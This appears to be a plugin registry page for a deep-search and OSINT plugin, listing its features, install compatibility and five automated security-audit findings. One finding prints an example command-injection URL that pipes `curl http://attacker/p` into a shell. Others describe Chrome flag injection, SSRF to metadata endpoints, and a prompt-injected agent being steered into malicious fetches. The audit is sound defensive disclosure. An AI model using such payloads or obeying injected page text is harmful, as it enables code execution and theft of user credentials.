Install verification: Ecosystem plugin: installs via dsh plugin add but declares no dsh.bundle and mounts no plugin capability — the L1-L5 install ladder does not rate it; the security scan still runs.Install verification details →
What it doesAI
Deep-search plugin with three-tier retrieval (surface multi-engine, deep-web mining, Tor proxy) and 23 tools for search/scrape/OSINT/archive/share.
- Three-tier retrieval: surface multi-engine search, deep-web mining, Tor proxy
- 23 tools in nine groups covering search, scrape, OSINT, archive, share
- Zero runtime deps (Node native fetch + WSL curl), optional API key config
Capability tags are AI-inferred or rule-extracted from the README (see badge) — vocabulary-limited, not install-verified. AI = inferred; README = literal keyword from the readme.

Verification & Compatibility○ Ecosystem plugin
Grouped by plugin version: each card lists the dsh versions actually tested against that artifact version and their install verdicts (L5 wins). Untested combinations are omitted — absence means untested, never assumed compatible. L1–L3 are a plugin-level static archive (independent of the dsh version — the same verdict on every dsh row): they sit in each row's level grid next to L4/L5, marked "static", while their evidence is stored once per plugin inside that row's "checks & evidence" instead of being duplicated per version.

✗ Running dsh 0.2.1-rc.2 is outside the declared range — the official install gate rejects it (incompatible-version).
To force-install, grant an exact-version exemption: dsh plugin allow-version dsh-search-pro@0.1.0 0.2.1-rc.2 (the exemption lives in the local profile; this site does not assume one)
Whether it actually runs is a separate question → see the measured matrix below (L1–L5).

Two automated layers, neither a manual review: a static scan (per-plugin rule checks) and a model-driven dynamic security audit that covers only the subset static-flagged at warn or above and never executes plugin code.
Static low; dynamic high (authoritative when present) → overall high.

show 5 audit findings
- highCommand injection: fetch_tor interpolates the caller-supplied URL into a `bash -lc` command string
src/fetch.ts:54The `url` argument of the fetch_tor tool is placed inside single quotes in a shell script executed by WSL bash, with no escaping or validation. A URL such as `http://x/'; curl http://attacker/p | sh; '` (or any URL containing a single quote) breaks out of the quoting and executes arbitrary commands in the WSL user context, which has access to the Windows filesystem (/mnt/c), config and credentials. URLs often come from untrusted search results or fetched pages, so a prompt-injected model can be steered into supplying a malicious one.
- mediumcurlGet uses `bash -lc` with an interpolated URL; encodeURIComponent leaves apostrophes unescaped enabling quote breakout/argument injection
src/share.ts:155Reachable via the search_share tool: searchMagnet -> searchMagnetBtdig builds `https://btdig.com/search?q=${encodeURIComponent(query)}`. encodeURIComponent does not escape `'`, so a query containing an apostrophe closes the quoting and injects arbitrary words as curl arguments (e.g. `-o <name>` to write the response to a relative path in the process cwd). Shell metacharacters like ; | & $ ` / : are percent-encoded, which limits but does not remove the injectable surface.
- mediumHeadless Chrome/Edge is launched with an unvalidated URL argument and `--no-sandbox`, allowing Chrome flag/argument injection
src/robust.ts:168The fetch_robust tool passes its raw `url` string as the final argv element to a real browser binary. The earlier stages reject invalid URLs but swallow the error, so a value beginning with `--` (e.g. `--renderer-cmd-prefix=...`) is still handed to Chrome as a command-line flag. Chrome flags such as renderer/gpu/utility cmd-prefix can spawn arbitrary processes; `--no-sandbox` additionally removes the renderer sandbox while loading arbitrary untrusted pages.
- mediumNo scheme/host validation in the shared HTTP helper: fetch_page/fetch_robust/fetch_tor can reach loopback, private and metadata endpoints
src/util.ts:16fetch_page/fetch_robust take a model-supplied URL and return the response body to the tool output with no host or scheme allow/block list, so the agent can be prompted (e.g. by text on a page it just fetched) into reading internal services such as http://127.0.0.1:<port>/ or cloud metadata endpoints and surfacing their content in the conversation. redirect:'follow' also bypasses any naive pre-checks.
- lowsearch_leaks returns the full unsalted SHA-1 of the supplied password to the model/transcript
src/index.tscheckPasswordLeak only transmits the 5-char k-anonymity prefix, but the tool result then renders the complete SHA-1 of the password into the tool output, which is stored in conversation history and may be logged or shared; an unsalted SHA-1 of a password is offline-crackable.
fetch_tor interpolates the caller-supplied URL into a `bash -lc` command, giving arbitrary command execution; secondary curl/Chrome argument injection and unrestricted SSRF.
Rule (2026-10-24): when a dynamic conclusion exists it is authoritative (it may raise or lower the level); without one, the static/vet fused tier applies. The audit never writes the exemption list (exemptions are manual only); a wrong conclusion is withdrawn by human review and the tier falls back to static/vet.
Disclaimer: the static scan and the dynamic security audit are both automated analysis, not a security guarantee. Always review what you install.
